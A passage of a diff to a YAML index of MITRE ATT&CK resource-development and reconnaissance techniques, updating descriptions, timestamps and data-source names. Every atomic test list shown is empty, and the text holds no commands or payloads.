kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-26T18:40:15.732Z' + created: '2021-03-17T20:09:13.222Z' + x_mitre_contributors: + - Kobi Haimovich, CardinalOps + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on post-compromise phases of the adversary lifecycle, + such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress + Tool Transfer](https://attack.mitre.org/techniques/T1105). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1608.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1608.002 + url: https://attack.mitre.org/techniques/T1608/002 + - source_name: Dell TG-3390 + description: Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, + August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved + August 18, 2018. + url: https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Upload Tool + description: |- + Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. + + Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo. + + Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. + id: attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2021-04-26T18:41:37.444Z' + created: '2021-03-17T20:31:07.828Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on post-compromise phases of the adversary lifecycle, + such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105). x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_platforms: @@ -51248,7 +54351,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Virtual Private Server description: |- - Before compromising a victim, adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure. + Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure. Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease) id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795 @@ -51256,7 +54359,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T17:58:32.476Z' + modified: '2021-04-15T02:52:41.901Z' created: '2020-10-01T00:44:23.935Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -51283,7 +54386,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Virtual Private Server description: |- - Before compromising a victim, adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig) + Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig) Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party. id: attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0 @@ -51291,7 +54394,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:01:45.792Z' + modified: '2021-04-15T03:03:59.919Z' created: '2020-10-01T00:55:17.771Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -51317,7 +54420,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Vulnerabilities description: |- - Before compromising a victim, adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database) + Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database) An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)). id: attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327 @@ -51325,7 +54428,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-16T01:54:39.868Z' + modified: '2021-04-15T03:16:32.119Z' created: '2020-10-15T02:59:38.628Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -51344,39 +54447,38 @@ resource-development: atomic_tests: [] T1583.006: technique: + created: '2020-10-01T00:50:29.936Z' + modified: '2021-04-15T02:53:19.246Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54 + description: Adversaries may register for web services that can be used during + targeting. A variety of popular websites exist for adversaries to register + for a web-based service that can be abused during later stages of the adversary + lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) + or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). + Using common services, such as those offered by Google or Twitter, makes it + easier for adversaries to hide in expected noise. By utilizing a web service, + adversaries can make it difficult to physically tie back operations to them. + name: Web Services + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1583.006 url: https://attack.mitre.org/techniques/T1583/006 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Web Services - description: Before compromising a victim, adversaries may register for web - services that can be used during targeting. A variety of popular websites - exist for adversaries to register for a web-based service that can be abused - during later stages of the adversary lifecycle, such as during Command and - Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration - Over Web Service](https://attack.mitre.org/techniques/T1567). Using common - services, such as those offered by Google or Twitter, makes it easier for - adversaries to hide in expected noise. By utilizing a web service, adversaries - can make it difficult to physically tie back operations to them. - id: attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-22T17:59:17.456Z' - created: '2020-10-01T00:50:29.936Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1584.006: technique: @@ -51392,14 +54494,13 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Web Services - description: 'Before compromising a victim, adversaries may compromise access - to third-party web services that can be used during targeting. A variety of - popular websites exist for legitimate users to register for web-based services, - such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take - ownership of a legitimate user''s access to a web service and use that web - service as infrastructure in support of cyber operations. Such web services - can be abused during later stages of the adversary lifecycle, such as during - Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) + description: 'Adversaries may compromise access to third-party web services that + can be used during targeting. A variety of popular websites exist for legitimate + users to register for web-based services, such as GitHub, Twitter, Dropbox, + Google, etc. Adversaries may try to take ownership of a legitimate user''s + access to a web service and use that web service as infrastructure in support + of cyber operations. Such web services can be abused during later stages of + the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected @@ -51411,7 +54512,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:02:30.304Z' + modified: '2021-04-15T03:04:40.184Z' created: '2020-10-01T01:01:00.176Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -51428,7 +54529,7 @@ reconnaissance: technique: id: attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b description: |- - Before compromising a victim, adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. + Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). name: Active Scanning @@ -51451,7 +54552,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:06:50.402Z' + modified: '2021-04-15T03:20:09.600Z' created: '2020-10-02T16:53:16.526Z' x_mitre_platforms: - PRE @@ -51464,8 +54565,8 @@ reconnaissance: Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. x_mitre_data_sources: - - Packet capture - - Network device logs + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' atomic_tests: [] T1591.002: technique: @@ -51482,7 +54583,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Business Relationships description: |- - Before compromising a victim, adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources. + Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f @@ -51490,7 +54591,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:08:59.209Z' + modified: '2021-04-15T03:36:58.964Z' created: '2020-10-02T16:27:55.713Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51517,7 +54618,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: CDNs description: |- - Before compromising a victim, adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region. + Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region. Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)). id: attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75 @@ -51525,7 +54626,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:17:09.684Z' + modified: '2021-04-15T03:47:55.905Z' created: '2020-10-02T16:59:56.648Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51551,7 +54652,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Client Configurations description: |- - Before compromising a victim, adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone. + Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c @@ -51559,7 +54660,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:52:10.774Z' + modified: '2021-04-15T03:22:14.288Z' created: '2020-10-02T16:47:16.719Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51616,7 +54717,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Credentials description: |- - Before compromising a victim, adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. + Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161 @@ -51624,7 +54725,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-27T02:27:31.090Z' + modified: '2021-04-15T03:26:44.352Z' created: '2020-10-02T14:55:43.815Z' x_mitre_contributors: - Vinayak Wadhwa, Lucideus @@ -51657,7 +54758,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: DNS description: |- - Before compromising a victim, adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. + Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea @@ -51665,7 +54766,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:02:39.701Z' + modified: '2021-04-15T03:29:18.740Z' created: '2020-10-02T15:47:10.102Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51694,7 +54795,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: DNS/Passive DNS description: |- - Before compromising a victim, adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. + Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532 @@ -51702,7 +54803,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:19:40.584Z' + modified: '2021-04-15T03:49:13.409Z' created: '2020-10-02T16:57:45.044Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51732,7 +54833,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Determine Physical Locations description: |- - Before compromising a victim, adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. + Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)). id: attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867 @@ -51740,7 +54841,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:09:48.419Z' + modified: '2021-04-15T03:37:35.863Z' created: '2020-10-02T16:32:33.126Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51769,7 +54870,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Digital Certificates description: |- - Before compromising a victim, adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location. + Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location. Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca @@ -51777,7 +54878,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:19:15.289Z' + modified: '2021-04-15T03:48:37.628Z' created: '2020-10-02T16:58:58.738Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51809,7 +54910,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Domain Properties description: |- - Before compromising a victim, adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. + Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). id: attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d @@ -51817,7 +54918,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-25T22:58:22.915Z' + modified: '2021-04-15T03:30:33.508Z' created: '2020-10-02T15:46:24.670Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51830,6 +54931,21 @@ reconnaissance: atomic_tests: [] T1589.002: technique: + created: '2020-10-02T14:56:24.866Z' + modified: '2021-04-15T03:27:19.702Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + type: attack-pattern + id: attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262 + description: |- + Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. + + Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). + name: Email Addresses + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1589.002 @@ 